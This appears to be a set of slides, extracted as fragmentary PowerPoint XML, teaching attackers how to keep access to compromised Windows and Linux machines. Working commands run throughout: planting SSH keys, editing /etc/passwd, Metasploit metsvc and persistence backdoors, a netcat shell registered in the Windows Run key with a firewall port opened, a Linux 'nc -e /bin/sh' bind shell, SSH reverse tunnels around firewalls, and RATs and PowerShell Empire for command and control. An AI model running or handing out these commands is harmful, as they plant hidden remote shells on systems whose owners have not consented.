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 Exploitation and Persistence methods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andr01d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persistence methods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SSH rsa key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ssh-keygen to generate personal rsa key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Plant ssh key to target machine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privilage users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Edit /etc/passwd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Give random users bash access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users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="alphaLcPeriod"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backdoor usage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Windows backdoors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Metsvc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 meterpreter, type run metsvc -A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Should install a persistent backdoor on port 31337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Persistence.rb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In meterpreter, type run persistence -A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Should install a persistent backdoor on port 31337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Both should run again when killed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Netcat backdoor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a Windows persistent nc backdoor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meterpreter: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Upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\System32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Reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run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Reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d ‘C;\windows\system32\nc.exe -Ldpn 445 -e cmd.exe’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Reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc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-f cmd -i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Netsh firewall show opmode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Netsh firewall add portopening TCP 445 “Service Firewall” ENABLE ALL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Netsh firewall show portopening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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Now use netcat to connect to the target with port 445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Netcat backdoor...cont.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linux, a bit different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the target machine has netcat TRADITIONAL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Sudo update-alternatives --config nc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/bin/nc.traditional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lpha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 have that selected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 target machine:</a:t>
            </a:r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Nc -lp 443 -e /bin/sh &amp;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romanL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 your machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF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Nc target.ip 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persistence methods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RAT’s (Remote Access Tools/Trojans)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Originally meant for sys admins and general system programers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Can be used in C2 infrastructure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Easy to find and download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SSH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Tunnel ssh around firewall for reverse listener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On target: ssh -R “port-to-forward-to”:localhost:22 host-ip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>On host: ssh -p “port-to-forward-do” localhost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methods...cont.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Powershell Empire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Program used for creating an agent in Empire through a powershell script run in windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="alphaL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